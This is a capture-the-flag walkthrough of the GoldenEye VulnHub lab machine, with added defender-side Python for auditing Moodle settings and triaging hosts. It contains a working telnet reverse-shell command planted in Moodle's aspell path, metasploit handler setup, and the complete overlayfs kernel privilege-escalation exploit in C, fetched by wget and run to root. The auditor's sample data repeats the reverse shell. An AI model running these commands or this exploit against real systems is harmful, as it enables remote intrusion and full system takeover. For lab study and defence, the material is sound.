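From the defender’s side, the weakness is that Moodle stores whatever string the admin enters as the aspell path and later hands it to a shell. As an added example (not Moodle’s own code), the audit below rejects any “path to executable” setting that is not a bare absolute path to an existing binary, and reports the tools and remote endpoints found in a value that is really a command. The setting names are Moodle’s (aspellpath, pathtodu, pathtophp); the expected-basename policy is an assumption of this example, and the sample values are constructed, the first being the value from the walkthrough.

```python
"""Audit 'path to executable' settings for values that are really shell commands."""
import os
import re

# Anything a bare path to a binary never contains.
SHELL_META = re.compile(r"""[\s;&|`$(){}<>'"\\]""")
# Network clients and interpreters that show up in staged payloads.
SUSPICIOUS_TOOLS = {'telnet', 'nc', 'ncat', 'socat', 'sh', 'bash',
                    'python', 'perl', 'curl', 'wget'}
IPV4_PORT = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b')

# Audit policy (an assumption of this example, not something Moodle enforces):
# the program each setting is expected to point at.
EXPECTED_BASENAME = {'aspellpath': 'aspell', 'pathtodu': 'du', 'pathtophp': 'php'}


def audit_path(setting, value, require_exists=True):
    """Return {'setting', 'ok', 'problems', 'details'} for one setting value.
    ok is True only for an empty value (feature disabled) or a bare absolute
    path with the expected basename that exists and is executable."""
    problems, details = [], {}
    if not value.strip():
        return {'setting': setting, 'ok': True, 'problems': [], 'details': {}}
    if SHELL_META.search(value):
        problems.append('shell metacharacters or whitespace in path')
        tokens = set(re.findall(r'[A-Za-z_][\w.-]*', value))
        tools = sorted(tokens & SUSPICIOUS_TOOLS)
        if tools:
            details['tools'] = tools
        hosts = sorted({f'{ip}:{port}' for ip, port in IPV4_PORT.findall(value)})
        if hosts:
            details['remote_endpoints'] = hosts
            problems.append('references a remote host:port (possible reverse shell)')
        return {'setting': setting, 'ok': False, 'problems': problems, 'details': details}
    if not os.path.isabs(value):
        problems.append('not an absolute path')   # resolved via PATH at run time
    expected = EXPECTED_BASENAME.get(setting)
    if expected and os.path.basename(value) != expected:
        problems.append(f'basename is not {expected!r}')
    if require_exists and not (os.path.isfile(value) and os.access(value, os.X_OK)):
        problems.append('no executable file at that path')
    return {'setting': setting, 'ok': not problems, 'problems': problems, 'details': details}


def audit_settings(settings, require_exists=True):
    """Audit a {setting: value} mapping and return only the failing entries."""
    results = (audit_path(k, v, require_exists) for k, v in settings.items())
    return [r for r in results if not r['ok']]


# Constructed sample: the value from the walkthrough beside two benign ones.
SAMPLE_SETTINGS = {
    'aspellpath': "sh -c '(sleep 10|telnet 10.0.133.20 4444|while : ; do sh && break; done 2>&1"
                  "|telnet 10.0.133.20 4444 >/dev/null 2>&1 &)'",
    'pathtodu': '/usr/bin/du',
    'pathtophp': 'php',
}

if __name__ == '__main__':
    for finding in audit_settings(SAMPLE_SETTINGS, require_exists=False):
        print(finding)
```

The same check applies to any web application that stores a helper-program path in its database, where a compromised admin account turns a settings page into command execution.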

Low Privilege shell

Modify the path to aspell changing the IP in the telnet connection to that of our kali box:

sh -c '(sleep 10|telnet 10.0.133.20 4444|while : ; do sh && break; done 2>&1|telnet 10.0.133.20 4444 >/dev/null 2>&1 &)'
goldeneye moodle aspell path

The spellchecker used by TinyMCE editor must also be set to “PSpellShell”

goldeneye moodle aspell path

netcat cannot be used to receive this reverse shell as it works over two telnet connections; metasploit’s multi/handler is used instead:

root@kali:~/vulnhub/goldeneyev1# msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST 10.0.133.20
LHOST => 10.0.133.20
msf exploit(multi/handler) > run

Trigger the reverse shell by editing a page with TinyMCE and running a spellcheck:

goldeneye spell check

Reverse shell connects back:

[*] Started reverse TCP double handler on 10.0.133.20:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hkIz4NyjVhH7lGXN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "hkIz4NyjVhH7lGXN\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.133.20:4444 -> 10.0.133.48:36916) at 2018-08-08 14:22:18 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

Python was used to spawn an interactive shell from the initial telnet double reverse shell:

python -c 'import pty; pty.spawn("/bin/sh");'

An interesting directory is discovered in the Apache default vhosts webroot /var/www/html/006-final/xvf7-flag/. Navigating to http://10.0.133.48/006-final/xvf7-flag/ displays the “Flag captured” page even though we do not yet have root.

goldeneye flag

After further enumeration from the low privilege shell there does not appear to be a way to escalate to root privileges without resorting to kernel exploits.

$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/lsb-release
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

searchsploit returns an exploit that should work with the Linux distribution and kernel version on the server:

root@kali:~/vulnhub/goldeneyev1# searchsploit ubuntu 14.04 3.13
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                         |  Path
                                                                                                                                       | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                   | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)              | exploits/linux/local/37293.txt
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Use a modified version of: “Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation”

URL: https://www.exploit-db.com/exploits/37292/

The exploit must be slightly modified so that the system() call which builds the helper shared library uses clang instead of gcc, as gcc is not available on the target (recall the text “For programming I highly prefer the Alternative to GCC, which FreeBSD uses…” found in the splashAdmin.php page).

The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

The C code is saved to the file oly.c and every reference to gcc is replaced with clang:

@TODO step through and fully understand exploit

root@kali:~/vulnhub/goldeneyev1# sed -i 's\gcc\clang\g' oly.c

Serve the modified exploit code with Python's SimpleHTTPServer so that it can be downloaded to the target.

root@kali:~/vulnhub/goldeneyev1# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.133.48 - - [08/Aug/2018 17:17:22] "GET /oly.c HTTP/1.1" 200 -

Download and compile the exploit on GoldenEye:

$ wget http://10.0.133.20/oly.c
wget http://10.0.133.20/oly.c
--2018-08-08 09:17:22--  http://10.0.133.20/oly.c
Connecting to 10.0.133.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3863 (3.8K) [text/plain]
Saving to: 'oly.c'

100%[======================================>] 3,863       --.-K/s   in 0s

2018-08-08 09:17:22 (723 MB/s) - 'oly.c' saved [3863/3863]
$ clang oly.c -o oly
clang oly.c -o oly
oly.c:61:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
oly.c:73:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
oly.c:78:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
oly.c:84:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
oly.c:94:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.
$ ls
ls
oly  oly.c

Run the exploit and escalate to root:

$ ./oly
./oly
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Discover the flag hidden in /root:

# cat /root/.flag.txt
cat /root/.flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

Since the /006-final/xvf7-flag/ path was already discovered (see above) from the low privilege shell, there is no need to go back to it.
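As an added defender-side example (not part of the original write-up or of the exploit code), the following Python performs the triage a responder would do on a host like this one: it compares the kernel version from uname -a against the fixed version quoted above and looks for the artefacts the exploit leaves behind. The version boundary and the artefact paths are the ones shown on this page; the list of world-writable directories is an assumption.

```python
"""Defender-side triage for the overlayfs local root issue used on this page.
Added example, not part of the original write-up or of the exploit code:
it checks whether a host's kernel predates the fixed version quoted on the
page and whether the exploit's artefacts (/etc/ld.so.preload pointing into
a world-writable directory, the scratch files under /tmp) are present."""
import platform
import re
from pathlib import Path

# Boundary quoted on the page: "before 3.19.0-21.21 in Ubuntu through 15.04".
# Assumption: compared as (major, minor, patch, ABI, upload) integer tuples.
# Vendors backported the fix into older series (3.13.x included), so True
# here is a triage signal to confirm against the vendor advisory, not proof.
FIXED_VERSION = (3, 19, 0, 21, 21)

# Release and build number in `uname -a`, e.g. "3.13.0-32-generic #57-Ubuntu".
_UNAME_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)-(\d+)-\S+\s+#(\d+)")

# Assumption: a legitimate preload library never lives in these directories.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

def kernel_version_from_uname(uname_a: str) -> tuple:
    """Extract (major, minor, patch, abi, upload) from `uname -a` output."""
    m = _UNAME_RE.search(uname_a)
    if not m:
        raise ValueError("no Ubuntu-style kernel version in: " + uname_a)
    return tuple(int(g) for g in m.groups())

def kernel_predates_fix(uname_a: str) -> bool:
    """True if the running kernel is older than FIXED_VERSION."""
    return kernel_version_from_uname(uname_a) < FIXED_VERSION

def suspicious_preload_entries(preload_text: str) -> list:
    """/etc/ld.so.preload lines that point into a world-writable directory."""
    entries = (line.strip() for line in preload_text.splitlines())
    return [e for e in entries if e.startswith(WORLD_WRITABLE)]

def exploit_artifacts(root: str = "/") -> list:
    """Paths the exploit on this page creates that currently exist under root."""
    names = ("tmp/ns_sploit", "tmp/ofs-lib.c", "tmp/ofs-lib.so", "etc/ld.so.preload")
    return [str(Path(root, n)) for n in names if Path(root, n).exists()]

if __name__ == "__main__":
    live = platform.release() + " " + platform.version()
    try:
        print("kernel predates fix:", kernel_predates_fix(live))
    except ValueError as err:
        print(err)
    print("artefacts present:", exploit_artifacts())
```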